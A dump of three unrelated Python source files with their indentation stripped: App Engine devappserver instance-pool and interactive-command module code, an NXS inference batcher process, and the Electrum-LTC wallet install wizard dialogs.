timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
return _THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raised is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed out while waiting for another one to complete']
def restart(self):
"""Restarts the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ' + str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
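# The sketch below is a self-contained illustration of the deadline-bounded condition-wait
# pattern shared by the _choose_instance implementations above. The _SketchPool class, its
# `workers` argument, the `available` attribute and mark_available are hypothetical names used
# only for this example; they are not part of the devappserver code.
class _SketchPool(object):
  """Hands out an available worker, waiting up to a deadline for one to free up."""

  def __init__(self, workers):
    self._workers = workers  # objects exposing a boolean `available` attribute
    self._condition = threading.Condition()

  def mark_available(self, worker):
    with self._condition:
      worker.available = True
      self._condition.notify()

  def choose(self, timeout_time):
    """Returns an available worker or None once timeout_time has passed."""
    with self._condition:
      while time.time() < timeout_time:
        for worker in self._workers:
          if worker.available:
            return worker
        # Wake up when notified or once the remaining deadline has elapsed.
        self._condition.wait(timeout_time - time.time())
      return None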
|
batcher_process.py
|
import logging
import os
import pickle
import time
import json
import cv2
import copy
import numpy as np
from abc import ABC, abstractmethod
from typing import Dict
from configs import NXS_CONFIG
from nxs_libs.interface.backend.input import (
BackendInputInterfaceFactory,
)
from nxs_libs.interface.backend.output import (
BackendOutputInterfaceFactory,
)
from nxs_types.infer_result import NxsInferStatus
from nxs_types.model import (
NxsModel,
)
from nxs_types.nxs_args import NxsBackendArgs
from nxs_types.scheduling_data import NxsSchedulingPerComponentModelPlan
from nxs_utils.logging import NxsLogLevel, setup_logger, write_log
class BackendBatcherProcess:
def __init__(
self,
args: NxsBackendArgs,
component_model: NxsModel,
component_model_plan: NxsSchedulingPerComponentModelPlan,
input_interface_args: Dict,
output_interface_args: Dict,
stop_flag,
next_process_stop_flag,
extra_params: Dict = {},
) -> None:
self.component_model = component_model
self.component_model_plan = component_model_plan
self.input_interface_args = input_interface_args
self.output_interface_args = output_interface_args
self.stop_flag = stop_flag
self.next_process_stop_flag = next_process_stop_flag
self.extra_params = extra_params
self.p = None
self.preproc_fn = None
self.preproc_extra_params = {}
try:
self.preproc_extra_params = json.loads(
self.component_model.model_desc.extra_preprocessing_metadata
)
except Exception:  # extra_preprocessing_metadata is optional; ignore missing or malformed JSON.
pass
self.log_prefix = "{}_BATCHER".format(component_model.model_uuid)
self.log_level = os.environ.get(NXS_CONFIG.LOG_LEVEL, NxsLogLevel.INFO)
self.next_topic_name = "{}_COMPUTE".format(component_model.model_uuid)
setup_logger()
# def _log(self, message):
# write_log(self.log_prefix, message, self.log_level)
def _log(self, message, log_level=logging.INFO):
logging.log(log_level, f"{self.log_prefix} - {message}")
def run(self):
from multiprocessing import Process
self.p = Process(target=self._run, args=())
self.p.start()
def _run(self):
cross_requests_batching = self.component_model.cross_requests_batching
max_latency = 1 # in secs
max_batch_size = self.component_model_plan.batch_size
for profile_unit in self.component_model.profile:
if profile_unit.batch_size == max_batch_size:
max_latency = profile_unit.latency_e2e.max / 1000.0 # in secs
break
self.input = BackendInputInterfaceFactory.create_input_interface(
**self.input_interface_args
)
self.output = BackendOutputInterfaceFactory.create_input_interface(
**self.output_interface_args
)
current_batch = []
current_metadata_batch = []
waiting_t0 = time.time()
to_exit = False
tt0 = time.time()
requests_count = 0
while True:
items = []
if not self.stop_flag.value:
items = self.input.get_batch()
else:
items = self.input.close_and_get_remains()
to_exit = True
for item in items:
preprocessed_data, metadata = item
current_batch.append(preprocessed_data)
current_metadata_batch.append(metadata)
if len(current_batch) == 1:
waiting_t0 = time.time()
if not cross_requests_batching or len(current_batch) >= max_batch_size:
requests_count += len(current_batch)
# transform [{key -> items}] into {key -> [items]}
transformed_batch = {}
for item in current_batch:
for tensor_name in item:
if not tensor_name in transformed_batch.keys():
transformed_batch[tensor_name] = []
transformed_batch[tensor_name].extend(item[tensor_name])
# for metadata in current_metadata_batch:
# self.request_exiting(metadata["extra"])
self.output.put_batch(
self.next_topic_name,
[(transformed_batch, current_metadata_batch)],
)
current_batch = []
current_metadata_batch = []
if current_batch and cross_requests_batching:
# the batch is not full; flush it anyway once it has waited more than half the max batch latency
if time.time() - waiting_t0 > max_latency / 2:
requests_count += len(current_batch)
# transform [{key -> item}] into {key -> [items]}
transformed_batch = {}
for item in current_batch:
for tensor_name in item:
if not tensor_name in transformed_batch.keys():
transformed_batch[tensor_name] = []
transformed_batch[tensor_name].extend(item[tensor_name])
for metadata in current_metadata_batch:
self.request_exiting(metadata["extra"])
self.output.put_batch(
self.next_topic_name,
[(transformed_batch, current_metadata_batch)],
)
current_batch = []
current_metadata_batch = []
if time.time() - tt0 > 5:
if requests_count > 0:
fps = requests_count / (time.time() - tt0)
print("batcher", "fps", fps)
requests_count = 0
tt0 = time.time()
if to_exit:
break
if not items:
time.sleep(0.01)
# trigger next process to stop
self.next_process_stop_flag.value = True
self._log("Exiting...")
def stop(self):
self.stop_flag.value = True
self.p.join()
def request_exiting(self, extra_metadata: Dict):
preprocessing_t0 = extra_metadata[self.component_model.model_uuid].pop(
"preprocessing_t0"
)
extra_metadata[self.component_model.model_uuid]["preprocessing_lat"] = (
time.time() - preprocessing_t0
)
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_ltc.wallet import Wallet, Abstract_Wallet
from electrum_ltc.storage import WalletStorage
from electrum_ltc.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_ltc.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_ltc.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_ltc.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:T4PsyoR5gC8B... \t-> LXqi2tzER...\n' +
'p2wpkh-p2sh:T4PsyoR5gC8B... \t-> MUuWxSpVC...\n' +
'p2wpkh:T4PsyoR5gC8B... \t-> ltc1q3fjf...')
# note: full key is T4PsyoR5gC8BGEoTe8So7YQWPnvdkqTJqRVpLoMmZVqBsunDdeuJ
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16 * 360 * i / self.n)
alpha2 = int(16 * 360 * 1 / self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
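# Note: QPainter.drawPie expects its start and span angles in 1/16th of a degree, which is why
# the alpha values above are scaled by 16 * 360.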
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
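# Note: wizard_dialog wraps each step method so its return value (coerced to a tuple) is passed
# straight to the run_next callback, while a GoBack exception either rewinds the wizard to the
# previous step or closes it when there is nothing to go back to.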
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum-LTC - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum-ltc.png')
self.show()
self.raise_()
self.refresh_gui()  # Needed for Qt on macOS. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-LTC wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None) #
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
